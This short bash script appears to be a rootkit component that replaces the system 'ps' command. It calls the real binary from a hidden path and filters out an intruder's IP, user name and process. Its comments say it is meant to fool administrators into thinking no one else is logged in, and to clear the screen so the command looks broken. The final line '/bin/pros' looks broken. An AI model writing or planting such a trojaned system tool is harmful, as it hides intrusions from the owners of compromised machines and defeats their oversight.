#!/bin/bash

# Execute real 'ps' command and don't display anything. Also mess with them
# This will make them think they are the only one connected to the box
# Clear the screen as well to make the command appear broken
/lib/module_ps $@ | grep -Ev "IP_TO_HIDE|USER_TO_HIDE|PROC_TO_HIDE" && clear

/bin/pros
